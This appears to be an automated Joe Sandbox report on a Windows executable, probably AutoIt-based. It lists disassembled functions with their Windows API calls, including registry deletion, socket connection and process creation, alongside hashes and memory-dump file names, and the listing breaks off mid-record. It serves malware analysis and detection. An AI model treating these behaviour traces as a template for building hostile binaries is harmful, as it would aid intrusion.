Opcode ID: 2be6601fdce042c548759c8b610eb381390fb8b38bfaff0699f55aa626ec2ab3
Instruction ID: d89cda210bed6e09013fb718adcaedd48c7e06dadb803989f7e650f97f9aff3d
Opcode Fuzzy Hash: 2be6601fdce042c548759c8b610eb381390fb8b38bfaff0699f55aa626ec2ab3
Instruction Fuzzy Hash: B7413875A14209EFDB60DF50E884A9ABBF8FB08310F14856AFD0597350E734ADA0DF50

Function 002D0FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D0FD4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D0FFE
FreeLibrary.KERNEL32(00000000), ref: 002D10B5

Part of subcall function 002D0FA5: RegCloseKey.ADVAPI32(?), ref: 002D101B
Part of subcall function 002D0FA5: FreeLibrary.KERNEL32(?), ref: 002D106D
Part of subcall function 002D0FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D1090

RegDeleteKeyW.ADVAPI32(?,?), ref: 002D1058

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 7ec8b41dfb17b14494c03a500cf9306a487c27d368443170f5abce41e096081a
Instruction ID: 2025adf52136286dfc368254a625b4e828ffb5d1bdf4651e2a749f32b053cafc
Opcode Fuzzy Hash: 7ec8b41dfb17b14494c03a500cf9306a487c27d368443170f5abce41e096081a
Instruction Fuzzy Hash: A5313C71D11109BFDB149F90ED89EFFB7BCEF08301F10016AE902E2251EA709E959AA4

Function 002D62CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 002D62EC
GetWindowLongW.USER32(013E59A8,000000F0), ref: 002D631F
GetWindowLongW.USER32(013E59A8,000000F0), ref: 002D6354
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002D6386
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 002D63B0
GetWindowLongW.USER32(00000000,000000F0), ref: 002D63C1
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 002D63DB

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: a265983e5f55e1a70b9c562a97a30c0f883ff57448139c57f0700626e9579af3
Instruction ID: 77ec366786035dcf26e01cd8a39fdb8e71636f38c0e204111bae65d7c8324045
Opcode Fuzzy Hash: a265983e5f55e1a70b9c562a97a30c0f883ff57448139c57f0700626e9579af3
Instruction Fuzzy Hash: 2F31F030650291EFDB61CF58EC88F5437E9BB8AB14F1941A6F9518B2B2CB71AC50DB90

Function 002ADAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB2E
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002ADB54
SysAllocString.OLEAUT32(00000000), ref: 002ADB57
SysAllocString.OLEAUT32(?), ref: 002ADB75
SysFreeString.OLEAUT32(?), ref: 002ADB7E
StringFromGUID2.OLE32(?,?,00000028), ref: 002ADBA3
SysAllocString.OLEAUT32(?), ref: 002ADBB1

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: bbe82f6fa97c792e7fd2d9cf214b6a2d41b4874ea501e11227ef33f2ca20d5fa
Instruction ID: ee331e9eca5c8ed045725e10d6119d353e43a7f49b54b2950a0f62ccef59733d
Opcode Fuzzy Hash: bbe82f6fa97c792e7fd2d9cf214b6a2d41b4874ea501e11227ef33f2ca20d5fa
Instruction Fuzzy Hash: 2021B636611219AFDF50DFB8DC88CBB73ACEB09364B058526FA16DB260DA70DC4587B4

Function 002C6173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 002C7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C7DB6

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002C61C6
WSAGetLastError.WSOCK32(00000000), ref: 002C61D5
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C620E
connect.WSOCK32(00000000,?,00000010), ref: 002C6217
WSAGetLastError.WSOCK32 ref: 002C6221
closesocket.WSOCK32(00000000), ref: 002C624A
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 002C6263

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: dee922297ca507b36f39786349620721357bf10e0cc8a804e2febe49e7f02281
Instruction ID: a06c4b2ce212c400a42c72a14e993200083f385e1bff1c6c0c0302416e5e92d1
Opcode Fuzzy Hash: dee922297ca507b36f39786349620721357bf10e0cc8a804e2febe49e7f02281
Instruction Fuzzy Hash: 2C319031620108ABEF10AF64DC89FBA77A9EB45711F04412DFD06E7291CB70AD549AA6

Function 002AF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 002AF671
__wcsnicmp.LIBCMT ref: 002AF692
__wcsnicmp.LIBCMT ref: 002AF6AC

Strings

#OnAutoItStartRegister, xrefs: 002AF6A6
#requireadmin, xrefs: 002AF68C
#notrayicon, xrefs: 002AF669

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 79d8f8eec2691f36dbb09560c0f19b258c488c42b64340516545cb36e1139e0a
Instruction ID: 52b869238bcb2308b8cccbbe63fb792d05e6876e6bf347ca04124425a5b36a80
Opcode Fuzzy Hash: 79d8f8eec2691f36dbb09560c0f19b258c488c42b64340516545cb36e1139e0a
Instruction Fuzzy Hash: 10216772234512A7D230EA74AE02EA7B39CEF57700F508039F84686051EFA89DB5D794

Function 002D75CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00251D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00251D73
Part of subcall function 00251D35: GetStockObject.GDI32(00000011), ref: 00251D87
Part of subcall function 00251D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00251D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002D7632
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002D763F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002D764A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002D7659
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002D7665

Strings

Msctls_Progress32, xrefs: 002D7603

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: ae3d52d6d765703253e8a2542a60f3390c9255478969025d5cdda75de7605e1d
Instruction ID: e7ce0a4a7407673a8980d7f895ff02ff0bc9ad1d2c737dfd62d127650c14da7c
Opcode Fuzzy Hash: ae3d52d6d765703253e8a2542a60f3390c9255478969025d5cdda75de7605e1d
Instruction Fuzzy Hash: 8011B2B2120219BFEF118F64CC85EE77F6DEF08798F014115BA04A21A0DB72DC21DBA4

Function 00279AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00279AE6

Part of subcall function 00273187: EncodePointer.KERNEL32(00000000), ref: 0027318A
Part of subcall function 00273187: __initp_misc_winsig.LIBCMT ref: 002731A5
Part of subcall function 00273187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00279EA0
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00279EB4
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00279EC7
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00279EDA
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00279EED
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00279F00
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00279F13
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00279F26
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00279F39
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00279F4C
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00279F5F
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00279F72
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00279F85
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00279F98
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00279FAB
Part of subcall function 00273187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00279FBE

__mtinitlocks.LIBCMT ref: 00279AEB
__mtterm.LIBCMT ref: 00279AF4

Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C56
Part of subcall function 00279B5C: _free.LIBCMT ref: 00279C5D
Part of subcall function 00279B5C: DeleteCriticalSection.KERNEL32(021,?,?,00279AF9,00277CD0,0030A0B8,00000014), ref: 00279C7F

__calloc_crt.LIBCMT ref: 00279B19
__initptd.LIBCMT ref: 00279B3B
GetCurrentThreadId.KERNEL32 ref: 00279B42

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: a3c923d8fe9027b25680a42dc35aedcbb2c8659a6eb6796d5e6e6947abf36544
Instruction ID: 83e55f63ed2581282c60d793a00a238e5173b3ea5ce22eeb1904cbf23f4f498f
Opcode Fuzzy Hash: a3c923d8fe9027b25680a42dc35aedcbb2c8659a6eb6796d5e6e6947abf36544
Instruction Fuzzy Hash: 61F0963263A72259E734BB747C07A4A27959F03734F20CA1AF45CC50D2FF3084E14960

Function 002DB635 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002DB644
_memset.LIBCMT ref: 002DB653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00316F20,00316F64), ref: 002DB682
CloseHandle.KERNEL32 ref: 002DB694

Strings

o1, xrefs: 002DB63E
do1, xrefs: 002DB64D

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: o1$do1
API String ID: 3277943733-3825723036
Opcode ID: c4d1899cfb2d5b3c9dda706a43acfa332b68c0dadb1a4df7dce26bdccb452187
Instruction ID: 0b8b835bd7008bb5d3fc5e7d77133006a3da55345f137a9f7460e74f2ec0e285
Opcode Fuzzy Hash: c4d1899cfb2d5b3c9dda706a43acfa332b68c0dadb1a4df7dce26bdccb452187
Instruction Fuzzy Hash: B0F054B1551300BBE21127A57C07FFB3B9DEB0C355F008061FA09D5191D7718C11CBA8

Function 0027406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00273F85), ref: 00274085
GetProcAddress.KERNEL32(00000000), ref: 0027408C
EncodePointer.KERNEL32(00000000), ref: 00274097
DecodePointer.KERNEL32(00273F85), ref: 002740B2

Strings

combase.dll, xrefs: 00274080
RoUninitialize, xrefs: 00274074

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: e3344874005c3a356aa0881d59be4144ea0c08959088e8efae2ef65ba6152858
Instruction ID: f37ce0fa30c3043491e8ac99045517f249599a56360126882cac204f398260e2
Opcode Fuzzy Hash: e3344874005c3a356aa0881d59be4144ea0c08959088e8efae2ef65ba6152858
Instruction Fuzzy Hash: 10E0BF70997341FFEB92BF61FD0DB453BA8B708742F108076F506E11A0CBB64A24CA18

Function 002B64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 002B660B
_memmove.LIBCMT ref: 002B6546

Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC

_memmove.LIBCMT ref: 002B65B9
_memmove.LIBCMT ref: 002B66A0
_memmove.LIBCMT ref: 002B66B9
_memmove.LIBCMT ref: 002B66D5

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction ID: 9bd75adb09277f705091d158992476ab53fef18e700478996e6ada80e7cdb2c0
Opcode Fuzzy Hash: 06c3e0da596de7e5ebd166ea91c544cb533233ce1895cc83c049d75c6dd0b7a7
Instruction Fuzzy Hash: 3E619C3052065A9BCF11EF60CC85EFE37A9AF09348F044518FD595B192DB38E869CF54

Function 002D01E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22

Part of subcall function 002D0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002D02BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D02FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002D0320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002D0349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 002D038C
RegCloseKey.ADVAPI32(00000000), ref: 002D0399

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: e44ee5539b789cba74e29b65aa1574b4d71904f67ba6257df86d0a57527714f0
Instruction ID: d032fb44d9db89ab7f88835608c51c02790dd62742c563632214a676fb90e54c
Opcode Fuzzy Hash: e44ee5539b789cba74e29b65aa1574b4d71904f67ba6257df86d0a57527714f0
Instruction Fuzzy Hash: D4514831528201AFC714EF64D889E6ABBE8FF85314F04491EF945872A2DB31ED29CF56

Function 002D5799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 002D57FB
GetMenuItemCount.USER32(00000000), ref: 002D5832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 002D585A
GetMenuItemID.USER32(?,?), ref: 002D58C9
GetSubMenu.USER32(?,?), ref: 002D58D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 002D5928

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 632fbd9c4832288628344bd90fccf3c4fc8ecc0f57538d6c069215496f4b6cd0
Instruction ID: 5c070304e1cd78b8bebbab25e676aa1e20a6fca63ebbdccd763b076d9932fd5a
Opcode Fuzzy Hash: 632fbd9c4832288628344bd90fccf3c4fc8ecc0f57538d6c069215496f4b6cd0
Instruction Fuzzy Hash: 44516C31E11A25EFCF11DF64C845AAEB7B4EF48320F144066ED16AB351CBB0AE919F94

Function 002AEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 002AEF06
VariantClear.OLEAUT32(00000013), ref: 002AEF78
VariantClear.OLEAUT32(00000000), ref: 002AEFD3
_memmove.LIBCMT ref: 002AEFFD
VariantClear.OLEAUT32(?), ref: 002AF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 002AF078

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
Instruction ID: f293fbb4386ed74e1c986fa1fd68ea0015b0f930c38a15fcc906cb342ed794bf
Opcode Fuzzy Hash: c7d60a062987156f16c79c4c6eb444e7222b7d971a04b2d5b160d8d4030fffd3
Instruction Fuzzy Hash: A3517AB5A10209EFDB10CF58C884AAAB7B8FF4D314B15856AED49DB305E734E911CFA0

Function 002B220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002B2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002B22A3
IsMenu.USER32(00000000), ref: 002B22C3
CreatePopupMenu.USER32 ref: 002B22F7
GetMenuItemCount.USER32(000000FF), ref: 002B2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 002B2386

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
Instruction ID: 0d8e5b7b5f9bf6b768f9ab0addc2d7d6596bbd5ba0e8acfd9d0d21ecae57ec4f
Opcode Fuzzy Hash: 7cdad829114c939fd546a5d82074906a604b38671ed9626284c4fb097706dbc2
Instruction Fuzzy Hash: 0B51C070A2130ADFDF21CF64D988BEDBBF5EF45394F1041A9E811A72A0D3749968CB51

Function 00251765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0025179A
GetWindowRect.USER32(?,?), ref: 002517FE
ScreenToClient.USER32(?,?), ref: 0025181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0025182C
EndPaint.USER32(?,?), ref: 00251876

Memory Dump Source

Source File: 00000000.00000002.2056947967.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2056933036.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2056997346.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057042922.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2057060422.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_BgroUcYHpy.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 182190091855448c9f3fa8371ee539d8765af20d997b773ba7d5f069866893e2
Instruction ID: 90be7d487e8ffe49da7ab78c36e1d8274d34cb75403d4e8d40835a4c613bcac9
